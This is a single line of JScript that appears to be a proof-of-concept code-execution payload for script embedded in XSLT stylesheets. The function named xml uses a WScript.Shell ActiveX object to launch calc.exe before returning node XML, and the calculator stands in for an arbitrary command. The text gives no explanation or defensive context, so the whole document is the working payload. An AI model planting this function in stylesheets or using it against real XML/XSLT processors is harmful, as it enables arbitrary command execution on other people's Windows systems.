function xml(nodelist) { var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); return nodelist.nextNode().xml; }